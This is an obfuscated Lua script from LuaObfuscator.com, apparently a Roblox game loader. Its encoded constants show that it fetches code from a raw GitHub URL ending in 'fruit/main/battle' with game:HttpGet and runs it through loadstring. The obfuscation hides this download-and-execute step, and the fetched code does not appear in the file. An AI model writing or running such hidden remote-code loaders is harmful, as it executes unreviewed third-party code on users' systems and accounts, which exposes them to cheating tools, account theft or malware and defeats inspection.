--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v109=v5(v81,v19);v19=nil;return v109;else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((3 -1)^(v32-(2 -1))))%(((2258 -(1523 + 114)) -(555 + 64))^(((v33-1) -(v32-1)) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0 + 0)) or ((1250 -373) -(282 + 595)) ;end end local function v21() local v34=0;local v35;while true do if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -((343 -(32 + 85)) + 1044)) ;v34=1;end if (v34==(4 -3)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v37 * (57 + 199)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -((1242 -(87 + 263)) + 65)) );v18=v18 + ((189 -(67 + 113)) -5) ;return (v41 * (12302277 + 4474939)) + (v40 * (121138 -55602)) + (v39 * ((1151 -682) -213)) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(7 -(5 + 0))) then v47=v20(v44,973 -(802 + 150) ,83 -52 );v48=((v20(v44,57 -25 )==(1 + 0)) and  -(998 -(915 + 82))) or 1 ;v42=8 -(777 -(201 + 571)) ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1 -(1138 -(116 + 1022)) ;end if (v42==(1190 -(1069 + 118))) then if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else local v110=0;while true do if (v110==(0 -0)) then v47=1 + 0 ;v45=0;break;end end end elseif (v47==((11815 -8977) -(217 + 151 + 423))) then return ((v46==(0 -0)) and (v48 * ((19 -(10 + 8))/0))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -2911) ) * (v45 + (v46/((444 -(416 + 26))^(165 -113)))) ;end if (v42==1) then v45=1 + 0 ;v46=(v20(v44,1 -0 ,458 -(145 + 293) ) * ((432 -(44 + 386))^((5541 -4023) -((3543 -2545) + (1347 -(814 + 45)))))) + v43 ;v42=(2 -1) + 1 ;end end end local function v25(v49) local v50=0 + (766 -(745 + 21)) ;local v51;local v52;while true do if (v50==(2 + 1)) then return v6(v52);end if (v50==(1 + 1)) then v52={};for v91=886 -(261 + 624) , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=4 -(2 -1) ;end if (v50==(1080 -(1020 + 60))) then v51=nil;if  not v49 then local v101=1423 -(630 + 793) ;while true do if (v101==(0 -0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=(3 -2) + 0 ;end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(1748 -(760 + 987)) );v18=v18 + v49 ;v50=1915 -(1789 + 124) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53~=(603 -(268 + 335))) then else local v87=(function() return 290 -(60 + 230) ;end)();local v88=(function() return;end)();while true do if (v87==0) then v88=(function() return 572 -(426 + 146) ;end)();while true do if (v88==(1 + 0)) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v88=(function() return 2;end)();end if (v88==0) then v54=(function() return {};end)();v55=(function() return {};end)();v88=(function() return 1457 -(282 + 1174) ;end)();end if (v88==(813 -(569 + 242))) then v53=(function() return  #"!";end)();break;end end break;end end end if (v53~=(5 -3)) then else for v93= #":",v23() do local v94=(function() return v21();end)();if (v20(v94, #"<", #":")==(0 + 0)) then local v104=(function() return 0;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v104==(1024 -(706 + 318))) then local v111=(function() return 0;end)();while true do if (v111~=(1252 -(721 + 530))) then else v104=(function() return 1;end)();break;end if (v111~=0) then else v105=(function() return 0;end)();v106=(function() return nil;end)();v111=(function() return 1;end)();end end end if (v104~=(1273 -(945 + 326))) then else while true do if (v105~=(4 -2)) then else local v154=(function() return 0;end)();while true do if (0~=v154) then else if (v20(v107, #"]", #"[")== #"{") then v108[2 + 0 ]=(function() return v59[v108[2]];end)();end if (v20(v107,2,2)== #"{") then v108[ #"xxx"]=(function() return v59[v108[ #"nil"]];end)();end v154=(function() return 1;end)();end if (v154==(701 -(271 + 429))) then v105=(function() return  #"-19";end)();break;end end end if (v105== #">") then local v155=(function() return 0;end)();local v156=(function() return;end)();while true do if (v155==0) then v156=(function() return 0 + 0 ;end)();while true do if ((1501 -(1408 + 92))~=v156) then else v105=(function() return 2;end)();break;end if (v156~=0) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(1288 -(993 + 295))) then local v176=(function() return 0;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 0;end)();while true do if (v177~=0) then else v108[ #"91("]=(function() return v22();end)();v108[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v106== #"]") then v108[ #"asd"]=(function() return v23();end)();elseif (v106==2) then v108[ #"asd"]=(function() return v23() -((1 + 1)^(1187 -(418 + 753))) ;end)();elseif (v106~= #"19(") then else local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182==(0 + 0)) then v183=(function() return 0;end)();while true do if (v183==0) then v108[ #"nil"]=(function() return v23() -(2^16) ;end)();v108[ #"0313"]=(function() return v22();end)();break;end end break;end end end v156=(function() return 1 + 0 ;end)();end end break;end end end if (v105~= #"-19") then else if (v20(v107, #"gha", #"asd")~= #">") then else v108[ #"asd1"]=(function() return v59[v108[ #"asd1"]];end)();end v54[v93]=(function() return v108;end)();break;end if (v105==0) then local v158=(function() return 0 + 0 ;end)();while true do if (v158~=1) then else v105=(function() return  #"}";end)();break;end if (v158==0) then v106=(function() return v20(v94,2, #"19(");end)();v107=(function() return v20(v94, #"http",6);end)();v158=(function() return 1 + 0 ;end)();end end end end break;end if (v104~=1) then else local v112=(function() return 529 -(406 + 123) ;end)();local v113=(function() return;end)();while true do if (v112~=(1769 -(1749 + 20))) then else v113=(function() return 0 + 0 ;end)();while true do if (v113~=(1323 -(1249 + 73))) then else v104=(function() return 1 + 1 ;end)();break;end if (v113~=(1145 -(466 + 679))) then else v107=(function() return nil;end)();v108=(function() return nil;end)();v113=(function() return 1;end)();end end break;end end end end end end for v95= #">",v23() do v55[v95-#"\\" ]=(function() return v28();end)();end return v57;end if (v53== #"\\") then local v89=(function() return 0 -0 ;end)();local v90=(function() return;end)();while true do if (v89~=(0 -0)) then else v90=(function() return 1900 -(106 + 1794) ;end)();while true do if ((1 + 1)==v90) then v53=(function() return 1 + 1 ;end)();break;end if (1~=v90) then else for v115= #" ",v58 do local v116=(function() return 0;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if ((2 -1)==v116) then v119=(function() return nil;end)();while true do if (v117~= #"[") then else if (v118== #"}") then v119=(function() return v21()~=(0 -0) ;end)();elseif (v118==(116 -(4 + 110))) then v119=(function() return v24();end)();elseif (v118== #"gha") then v119=(function() return v25();end)();end v59[v115]=(function() return v119;end)();break;end if ((584 -(57 + 527))==v117) then local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172==0) then v173=(function() return 1427 -(41 + 1386) ;end)();while true do if (v173~=(103 -(17 + 86))) then else v118=(function() return v21();end)();v119=(function() return nil;end)();v173=(function() return 1 + 0 ;end)();end if (v173==1) then v117=(function() return  #",";end)();break;end end break;end end end end break;end if (0~=v116) then else local v164=(function() return 0 -0 ;end)();local v165=(function() return;end)();while true do if (v164==0) then v165=(function() return 0;end)();while true do if ((0 -0)~=v165) then else v117=(function() return 0;end)();v118=(function() return nil;end)();v165=(function() return 1;end)();end if (1~=v165) then else v116=(function() return 1;end)();break;end end break;end end end end end v57[ #"xnx"]=(function() return v21();end)();v90=(function() return 2;end)();end if (v90~=0) then else v58=(function() return v23();end)();v59=(function() return {};end)();v90=(function() return 167 -(122 + 44) ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[1 + 1 ];local v65=v60[(31 -22) -(20 -14) ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1 + 0 ;local v71= -(1 + 0);local v72={};local v73={...};local v74=v12("#",...) -(66 -(30 + 35)) ;local v75={};local v76={};for v85=1329 -((1815 -(697 + 321)) + 532) ,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 + 0 ];else v76[v85]=v73[v85 + 1 + (0 -0) ];end end local v77=(v74-v68) + (1258 -(1043 + 214)) ;local v78;local v79;while true do local v86=0 -0 ;while true do if ((v86==(1212 -(323 + (1883 -994)))) or (588<=432)) then v78=v66[v70];v79=v78[(4 -2) -1 ];v86=581 -(361 + 219) ;end if (v86==(1 + 0)) then if (v79<=(323 -(53 + 104 + 163))) then if (v79<=(1 + 0)) then if (v79==((0 -0) -(0 -0))) then do return;end else v76[v78[(1642 -(322 + 905)) -(15 + 398) ]]=v78[3];end elseif (v79>(1 + 1)) then local v122=v78[2 -0 ];local v123=v76[v78[339 -(144 + 192) ]];v76[v122 + (983 -(18 + 964)) ]=v123;v76[v122]=v123[v78[14 -10 ]];else local v127=v78[2 + 0 ];local v128,v129=v69(v76[v127](v13(v76,v127 + 1 + 0 ,v78[1507 -(363 + 1141) ])));v71=(v129 + v127) -(1581 -((1794 -(602 + 9)) + (1586 -(449 + 740)))) ;local v130=850 -(20 + 830) ;for v159=v127,v71 do v130=v130 + 1 + 0 ;v76[v159]=v128[v130];end end elseif (v79<=((876 -(826 + 46)) + 1)) then if ((4797>=3895) and (v79>(130 -(116 + 10)))) then local v131=1975 -(1913 + (1009 -(245 + 702))) ;local v132;while true do if (v131==(0 + 0)) then v132=v78[740 -(542 + 196) ];v76[v132]=v76[v132](v13(v76,v132 + (1 -0) ,v71));break;end end else v76[v78[1 + 1 ]]();end elseif ((3577==3577) and (3111>=2134) and (v79==(4 + 2))) then v76[v78[1 + 1 ]]=v62[v78[3 -0 ]];else local v135;local v136,v137;local v138;local v139;v76[v78[2]]=v62[v78[9 -6 ]];v70=v70 + 1 + 0 + 0 ;v78=v66[v70];v76[v78[858 -(564 + 292) ]]=v62[v78[7 -4 ]];v70=v70 + (2 -1) ;v78=v66[v70];v139=v78[2];v138=v76[v78[1554 -(1126 + 425) ]];v76[v139 + (406 -(118 + 287)) ]=v138;v76[v139]=v138[v78[4 + 0 ]];v70=v70 + (3 -(1900 -(260 + 1638))) ;v78=v66[v70];v76[v78[1123 -(118 + 1003) ]]=v78[3 + 0 ];v70=v70 + (2 -1) ;v78=v66[v70];v139=v78[379 -(142 + 235) ];v136,v137=v69(v76[v139](v13(v76,v139 + ((444 -(382 + 58)) -3) ,v78[1 + 2 ])));v71=(v137 + v139) -(978 -((1773 -1220) + 424)) ;v135=1138 -(782 + 296 + 60) ;for v162=v139,v71 do local v163=0;while true do if ((3794>3693) and (2355==2355) and (v163==(0 -0))) then v135=v135 + 1 + 0 ;v76[v162]=v136[v135];break;end end end v70=v70 + 1 + 0 ;v78=v66[v70];v139=v78[2 + 0 ];v76[v139]=v76[v139](v13(v76,v139 + (1 -0) + 0 ,v71));v70=v70 + 1 + 0 ;v78=v66[v70];v76[v78[4 -(5 -3) ]]();v70=v70 + (2 -1) ;v78=v66[v70];do return;end end v70=v70 + (2 -1) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F69666F72676F7470612O73776F72643132332F66727569742F6D61696E2F62612O746C6500083O0012073O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
